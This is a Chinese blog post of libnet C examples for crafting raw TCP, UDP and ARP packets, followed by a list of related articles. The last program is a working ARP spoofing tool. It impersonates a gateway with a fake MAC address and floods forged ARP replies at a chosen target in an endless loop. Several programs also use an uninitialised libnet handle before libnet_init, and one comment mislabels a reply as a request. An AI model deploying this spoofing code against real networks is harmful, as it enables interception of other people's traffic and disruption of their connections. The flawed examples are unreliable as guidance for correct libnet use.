libnet发包例子(tcp udp arp广播)
- #include <libnet.h>
- int main() {
- libnet_t *handle; /* Libnet句柄 */
- int packet_size; /* 构造的数据包大小 */
- char *device = "eth0"; /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */
- char *src_ip_str = "192.168.2.148"; /* 源IP地址字符串 */
- char *dst_ip_str = "192.168.2.170"; /* 目的IP地址字符串 */
- u_char src_mac[6] = {0x00, 0x0c, 0x29, 0xba, 0xee, 0xdd}; /* 源MAC */
- u_char dst_mac[6] = {0x00, 0x0c, 0x29, 0x6d, 0x4d, 0x5c}; /* 目的MAC */
- u_long dst_ip, src_ip; /* 网路序的目的IP和源IP */
- char error[LIBNET_ERRBUF_SIZE]; /* 出错信息 */
- libnet_ptag_t eth_tag, ip_tag, tcp_tag, tcp_op_tag; /* 各层build函数返回值 */
- u_short proto = IPPROTO_TCP; /* 传输层协议 */
- u_char payload[255] = {0}; /* 承载数据的数组,初值为空 */
- u_long payload_s = 0; /* 承载数据的长度,初值为0 */
- /* 把目的IP地址字符串转化成网络序 */
- dst_ip = libnet_name2addr4(handle, dst_ip_str, LIBNET_RESOLVE);
- /* 把源IP地址字符串转化成网络序 */
- src_ip = libnet_name2addr4(handle, src_ip_str, LIBNET_RESOLVE);
- /* 初始化Libnet */
- if ( (handle = libnet_init(LIBNET_LINK, device, error)) == NULL ) {
- printf("libnet_init failure\n");
- return (-1);
- };
- strncpy(payload, "test", sizeof(payload)-1); /* 构造负载的内容 */
- payload_s = strlen(payload); /* 计算负载内容的长度 */
- #if 0
- /* 构建TCP的选项,通常在第一个TCP通信报文中设置MSS */
- tcp_op_tag = libnet_build_tcp_options(
- payload,
- payload_s,
- handle,
- 0
- );
- if (tcp_op_tag == -1) {
- printf("build_tcp_options failure\n");
- return (-2);
- };
- #endif
- tcp_tag = libnet_build_tcp(
- 30330, /* 源端口 */
- 30331, /* 目的端口 */
- 8888, /* 序列号 */
- 8889, /* 确认号 */
- TH_PUSH | TH_ACK, /* Control flags */
- 14600, /* 窗口尺寸 */
- 0, /* 校验和,0为自动计算 */
- 0, /* 紧急指针 */
- LIBNET_TCP_H + payload_s, /* 长度 */
- payload, /* 负载内容 */
- payload_s, /* 负载内容长度 */
- handle, /* libnet句柄 */
- 0 /* 新建包 */
- );
- if (tcp_tag == -1) {
- printf("libnet_build_tcp failure\n");
- return (-3);
- };
- /* 构造IP协议块,返回值是新生成的IP协议快的一个标记 */
- ip_tag = libnet_build_ipv4(
- LIBNET_IPV4_H + LIBNET_TCP_H + payload_s, /* IP协议块的总长,*/
- 0, /* tos */
- (u_short) libnet_get_prand(LIBNET_PRu16), /* id,随机产生0~65535 */
- 0, /* frag 片偏移 */
- (u_int8_t)libnet_get_prand(LIBNET_PR8), /* ttl,随机产生0~255 */
- proto, /* 上层协议 */
- 0, /* 校验和,此时为0,表示由Libnet自动计算 */
- src_ip, /* 源IP地址,网络序 */
- dst_ip, /* 目标IP地址,网络序 */
- NULL, /* 负载内容或为NULL */
- 0, /* 负载内容的大小*/
- handle, /* Libnet句柄 */
- 0 /* 协议块标记可修改或创建,0表示构造一个新的*/
- );
- if (ip_tag == -1) {
- printf("libnet_build_ipv4 failure\n");
- return (-4);
- };
- /* 构造一个以太网协议块,只能用于LIBNET_LINK */
- eth_tag = libnet_build_ethernet(
- dst_mac, /* 以太网目的地址 */
- src_mac, /* 以太网源地址 */
- ETHERTYPE_IP, /* 以太网上层协议类型,此时为IP类型 */
- NULL, /* 负载,这里为空 */
- 0, /* 负载大小 */
- handle, /* Libnet句柄 */
- 0 /* 协议块标记,0表示构造一个新的 */
- );
- if (eth_tag == -1) {
- printf("libnet_build_ethernet failure\n");
- return (-5);
- };
- packet_size = libnet_write(handle); /* 发送已经构造的数据包*/
- libnet_destroy(handle); /* 释放句柄 */
- return (0);
- }
UDP:
- #include <libnet.h>
- int main() {
- libnet_t *handle; /* Libnet句柄 */
- int packet_size; /* 构造的数据包大小 */
- char *device = "eth0"; /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */
- char *src_ip_str = "192.168.2.148"; /* 源IP地址字符串 */
- char *dst_ip_str = "192.168.2.170"; /* 目的IP地址字符串 */
- u_char src_mac[6] = {0x00, 0x0c, 0x29, 0xba, 0xee, 0xdd}; /* 源MAC */
- u_char dst_mac[6] = {0x00, 0x0c, 0x29, 0x6d, 0x4d, 0x5c}; /* 目的MAC */
- u_long dst_ip, src_ip; /* 网路序的目的IP和源IP */
- char error[LIBNET_ERRBUF_SIZE]; /* 出错信息 */
- libnet_ptag_t eth_tag, ip_tag, udp_tag; /* 各层build函数返回值 */
- u_short proto = IPPROTO_UDP; /* 传输层协议 */
- u_char payload[255] = {0}; /* 承载数据的数组,初值为空 */
- u_long payload_s = 0; /* 承载数据的长度,初值为0 */
- /* 把目的IP地址字符串转化成网络序 */
- dst_ip = libnet_name2addr4(handle, dst_ip_str, LIBNET_RESOLVE);
- /* 把源IP地址字符串转化成网络序 */
- src_ip = libnet_name2addr4(handle, src_ip_str, LIBNET_RESOLVE);
- /* 初始化Libnet */
- if ( (handle = libnet_init(LIBNET_LINK, device, error)) == NULL ) {
- printf("libnet_init failure\n");
- return (-1);
- };
- strncpy(payload, "test", sizeof(payload)-1); /* 构造负载的内容 */
- payload_s = strlen(payload); /* 计算负载内容的长度 */
- udp_tag = libnet_build_udp(
- 30330, /* 源端口 */
- 30331, /* 目的端口 */
- LIBNET_UDP_H + payload_s, /* 长度 */
- 0, /* 校验和,0为libnet自动计算 */
- payload, /* 负载内容 */
- payload_s, /* 负载内容长度 */
- handle, /* libnet句柄 */
- 0 /* 新建包 */
- );
- if (udp_tag == -1) {
- printf("libnet_build_tcp failure\n");
- return (-3);
- };
- /* 构造IP协议块,返回值是新生成的IP协议快的一个标记 */
- ip_tag = libnet_build_ipv4(
- LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* IP协议块的总长,*/
- 0, /* tos */
- (u_short) libnet_get_prand(LIBNET_PRu16), /* id,随机产生0~65535 */
- 0, /* frag 片偏移 */
- (u_int8_t)libnet_get_prand(LIBNET_PR8), /* ttl,随机产生0~255 */
- proto, /* 上层协议 */
- 0, /* 校验和,此时为0,表示由Libnet自动计算 */
- src_ip, /* 源IP地址,网络序 */
- dst_ip, /* 目标IP地址,网络序 */
- NULL, /* 负载内容或为NULL */
- 0, /* 负载内容的大小*/
- handle, /* Libnet句柄 */
- 0 /* 协议块标记可修改或创建,0表示构造一个新的*/
- );
- if (ip_tag == -1) {
- printf("libnet_build_ipv4 failure\n");
- return (-4);
- };
- /* 构造一个以太网协议块,只能用于LIBNET_LINK */
- eth_tag = libnet_build_ethernet(
- dst_mac, /* 以太网目的地址 */
- src_mac, /* 以太网源地址 */
- ETHERTYPE_IP, /* 以太网上层协议类型,此时为IP类型 */
- NULL, /* 负载,这里为空 */
- 0, /* 负载大小 */
- handle, /* Libnet句柄 */
- 0 /* 协议块标记,0表示构造一个新的 */
- );
- if (eth_tag == -1) {
- printf("libnet_build_ethernet failure\n");
- return (-5);
- };
- packet_size = libnet_write(handle); /* 发送已经构造的数据包*/
- libnet_destroy(handle); /* 释放句柄 */
- return (0);
- }
- #include <libnet.h>
- int main() {
- libnet_t *handle; /* Libnet句柄 */
- int packet_size;
- char *device = "eth0"; /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */
- u_int8_t *src_ip_str = "192.168.128.200"; /* 源IP地址字符串 */
- u_int8_t *dst_ip_str = "192.168.128.88"; /* 目的IP地址字符串 */
- u_int8_t src_mac[6] = {0x00, 0x0c, 0x29, 0x73, 0xfa, 0x86};/* 源MAC */
- u_int8_t dst_mac[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};/* 目的MAC,广播地址 */
- /* 接收方MAC,ARP请求目的就是要询问对方MAC,所以这里填写0 */
- u_int8_t rev_mac[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
- u_int32_t dst_ip, src_ip; /* 网路序的目的IP和源IP */
- char error[LIBNET_ERRBUF_SIZE]; /* 出错信息 */
- libnet_ptag_t arp_proto_tag, eth_proto_tag;
- /* 把目的IP地址字符串转化成网络序 */
- dst_ip = libnet_name2addr4(handle, dst_ip_str, LIBNET_RESOLVE);
- /* 把源IP地址字符串转化成网络序 */
- src_ip = libnet_name2addr4(handle, src_ip_str, LIBNET_RESOLVE);
- if ( dst_ip == -1 || src_ip == -1 ) {
- printf("ip address convert error\n");
- exit(-1);
- };
- /* 初始化Libnet,注意第一个参数和TCP初始化不同 */
- if ( (handle = libnet_init(LIBNET_LINK_ADV, device, error)) == NULL ) {
- printf("libnet_init: error [%s]\n", error);
- exit(-2);
- };
- /* 构造arp协议块 */
- arp_proto_tag = libnet_build_arp(
- ARPHRD_ETHER, /* 硬件类型,1表示以太网硬件地址 */
- ETHERTYPE_IP, /* 0x0800表示询问IP地址 */
- 6, /* 硬件地址长度 */
- 4, /* IP地址长度 */
- ARPOP_REQUEST, /* 操作方式:ARP请求 */
- src_mac, /* source MAC addr */
- (u_int8_t *)&src_ip, /* src proto addr */
- rev_mac, /* dst MAC addr */
- (u_int8_t *)&dst_ip, /* dst IP addr */
- NULL, /* no payload */
- 0, /* payload length */
- handle, /* libnet tag */
- 0 /* Create new one */
- );
- if (arp_proto_tag == -1) {
- printf("build IP failure\n");
- exit(-3);
- };
- /* 构造一个以太网协议块
- You should only use this function when
- libnet is initialized with the LIBNET_LINK interface.*/
- eth_proto_tag = libnet_build_ethernet(
- dst_mac, /* 以太网目的地址 */
- src_mac, /* 以太网源地址 */
- ETHERTYPE_ARP, /* 以太网上层协议类型,此时为ARP请求 */
- NULL, /* 负载,这里为空 */
- 0, /* 负载大小 */
- handle, /* Libnet句柄 */
- 0 /* 协议块标记,0表示构造一个新的 */
- );
- if (eth_proto_tag == -1) {
- printf("build eth_header failure\n");
- return (-4);
- };
- packet_size = libnet_write(handle); /* 发送已经构造的数据包*/
- libnet_destroy(handle); /* 释放句柄 */
- return (0);
- }
- #include <libnet.h>
- int main() {
- libnet_t *handle; /* Libnet句柄 */
- int packet_size;
- char *device = "eth0"; /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */
- u_int8_t *src_ip_str = "192.168.2.30"; /* 冒充的网关IP */
- u_int8_t *dst_ip_str = "192.168.2.170"; /* 干扰的目标IP */
- u_int8_t src_mac[6] = {0x00, 0x0c, 0x29, 0x73, 0xfa, 0x11};/* 虚假的源MAC */
- u_int8_t dst_mac[6] = {0x00, 0x0c, 0x29, 0x6d, 0x4d, 0x5c};/* 干扰的目标MAC */
- u_int32_t dst_ip, src_ip; /* 网路序的目的IP和源IP */
- char error[LIBNET_ERRBUF_SIZE]; /* 出错信息 */
- libnet_ptag_t arp_proto_tag, eth_proto_tag;
- /* 把目的IP地址字符串转化成网络序 */
- dst_ip = libnet_name2addr4(handle, dst_ip_str, LIBNET_RESOLVE);
- /* 把源IP地址字符串转化成网络序 */
- src_ip = libnet_name2addr4(handle, src_ip_str, LIBNET_RESOLVE);
- if ( dst_ip == -1 || src_ip == -1 ) {
- printf("ip address convert error\n");
- exit(-1);
- };
- /* 初始化Libnet,注意第一个参数和TCP初始化不同 */
- if ( (handle = libnet_init(LIBNET_LINK_ADV, device, error)) == NULL ) {
- printf("libnet_init: error [%s]\n", error);
- exit(-2);
- };
- /* 构造arp协议块 */
- arp_proto_tag = libnet_build_arp(
- ARPHRD_ETHER, /* 硬件类型,1表示以太网硬件地址 */
- ETHERTYPE_IP, /* 0x0800表示询问IP地址 */
- 6, /* 硬件地址长度 */
- 4, /* IP地址长度 */
- ARPOP_REPLY, /* 操作方式:ARP请求 */
- src_mac, /* source MAC addr */
- (u_int8_t *)&src_ip, /* src proto addr */
- dst_mac, /* dst MAC addr */
- (u_int8_t *)&dst_ip, /* dst IP addr */
- NULL, /* no payload */
- 0, /* payload length */
- handle, /* libnet tag */
- 0 /* Create new one */
- );
- if (arp_proto_tag == -1) {
- printf("build IP failure\n");
- exit(-3);
- };
- /* 构造一个以太网协议块
- You should only use this function when
- libnet is initialized with the LIBNET_LINK interface.*/
- eth_proto_tag = libnet_build_ethernet(
- dst_mac, /* 以太网目的地址 */
- src_mac, /* 以太网源地址 */
- ETHERTYPE_ARP, /* 以太网上层协议类型,此时为ARP请求 */
- NULL, /* 负载,这里为空 */
- 0, /* 负载大小 */
- handle, /* Libnet句柄 */
- 0 /* 协议块标记,0表示构造一个新的 */
- );
- if (eth_proto_tag == -1) {
- printf("build eth_header failure\n");
- return (-4);
- };
- while(1) {
- packet_size = libnet_write(handle); /* 死循环发送arp欺骗广播 */
- usleep(1000);
- };
- libnet_destroy(handle); /* 释放句柄 */
- return (0);
- }
- from:http://blog.chinaunix.net/uid-10540984-id-3245098.html
libnet发包例子(tcp udp arp广播)的更多相关文章
- 三十天学不会TCP,UDP/IP网络编程-ARP -- 连接MAC和IP
继续来做(da)推(guang)介(gao)我自己的!由于这两年接触到了比较多的这方面的知识,不想忘了,我决定把他们记录下来,所以决定在GitBook用半年时间上面写下来,这是目前写的一节,目前已完成 ...
- [JSBSim]基于winsocket2的TCP\UDP使用例子
TCP部分: 参考:http://blog.csdn.net/sbfksmq/article/details/50808863 另附:linux下的tcp/udp参考:https://www.cnbl ...
- centos Linux系统日常管理2 tcpdump,tshark,selinux,strings命令, iptables ,crontab,TCP,UDP,ICMP,FTP网络知识 第十五节课
centos Linux系统日常管理2 tcpdump,tshark,selinux,strings命令, iptables ,crontab,TCP,UDP,ICMP,FTP网络知识 第十五节课 ...
- 高性能 TCP & UDP 通信框架 HP-Socket v3.3.1
HP-Socket 是一套通用的高性能 TCP/UDP 通信框架,包含服务端组件.客户端组件和 Agent 组件,广泛适用于各种不同应用场景的 TCP/UDP 通信系统,提供 C/C++.C#.Del ...
- HTTP,FTP,TCP,UDP及SOCKET
一.TCP/IP协议简析TCP/IP是个协议组,可分为三个层次:网络层.传输层和应用层:网络层:IP协议.ICMP协议.ARP协议.RARP协议和BOOTP协议传输层:TCP协议与UDP协议应用层:F ...
- SOCKET,TCP/UDP,HTTP,FTP
(一)TCP/UDP,SOCKET,HTTP,FTP简析 TCP/IP是个协议组,可分为三个层次:网络层.传输层和应用层: 网络层:IP协议.ICMP协议.ARP协议.RARP协议和BOOTP协议 传 ...
- [网络] SOCKET, TCP/UDP, HTTP, FTP
(一)TCP/UDP,SOCKET,HTTP,FTP简析 TCP/IP是个协议组,可分为三个层次:网络层.传输层和应用层: 网络层:IP协议.ICMP协议.ARP协议.RARP协议和BOOTP协议 传 ...
- TCP/UDP简介
TCP/UDP简介 Socket小白篇-附加TCP/UDP简介 Socket 网络通信的要素 TCP和UDP Socket的通信流程图 1.Socket 什么是Socket Socket:又称作是套接 ...
- 异常处理与网络基础中的tcp,udp协议
# 异常处理: # 什么是异常?异常和错误的区别 # Error 语法错误 比较明显的错误 在编译代码阶段就能检测出来 # Iteration 异常 在执行代码的过程中引发的异常 # 异常发生之后的效 ...
随机推荐
- Ruby on Rails Tutorial 第一章 之 Heroku部署
1.目的:用Heroku将开发环境部署到生产环境中.Heroku专门用于部署Rails和其他Web应用,部署Rails应用的过程非常简单——只要源码纳入Git版本控制系统就好. 2.搭建Heroku部 ...
- Redis 列表(List)
Redis列表是简单的字符串列表,按照插入顺序排序.你可以添加一个元素导列表的头部(左边)或者尾部(右边) 一个列表最多可以包含 232 - 1 个元素 (4294967295, 每个列表超过40亿个 ...
- Android WebView的使用方法总结
本文主要讲解WebView的一些常用使用方法 代码如下: xml文件: <LinearLayout xmlns:android="http://schemas.android.com/ ...
- [Qt5] 减少dll依赖和大小(特别是webkit的大小和依赖)
Qt5的依赖太多, 而且很dll非常大. 折腾了好久, 摸索了一些精简的方法. webkit是个非常蛋疼的东西, 依赖超多, 又很庞大. 所以需不需要webkit是完全不同的. 如何编译Qt5可以参考 ...
- iCloud之旅
1.创建BIDTinyPixDocument类 #import <UIKit/UIKit.h> //创建文档类 @interface TinyPixDocument : UIDocumen ...
- SSIS 学习(2):数据流任务(上)【转】
数据流任务是SSIS中的一个核心任务,估计大多数ETL包中,都离不开数据流任务.所以我们也从数据流任务学起. 数据流任务包括三种不同类型的数据流组件:源.转换.目标.其中: 源:它是指一组数据存储体, ...
- Redis' High Availability
Redis Sentinel is a system designed to help managing Redis instances. It performs the following thre ...
- KindEditor图片上传到七牛云
自己做了一个网站,编辑器用的是KindEditor,平时会涉及到KindEditor自带的图片上传,但是服务器用的是虚拟主机,没多少空间,就一直想着把图片放在免费的云存储空间,之前看KindEdito ...
- 【概率】Uva 10900 - So you want to be a 2n-aire?
写完这题赶紧开新题... 话说这题让我重新翻了概率论课本,果然突击完了接着还给老师了,毫无卵用. 很多人拿这位大神的题解作引,在这我也分享给大家~ 对于其中的公式在这里做一点简要的说明.因为自己也是理 ...
- ORACLE之PACKAGE
刚学pl/sql编程,写了两个package.pkg_temp_fn和pkg_temp_fn2.内容涉及pl/sql基本语法,游标,存储过程(in,out),函数(有返回值). pkg_temp_fn ...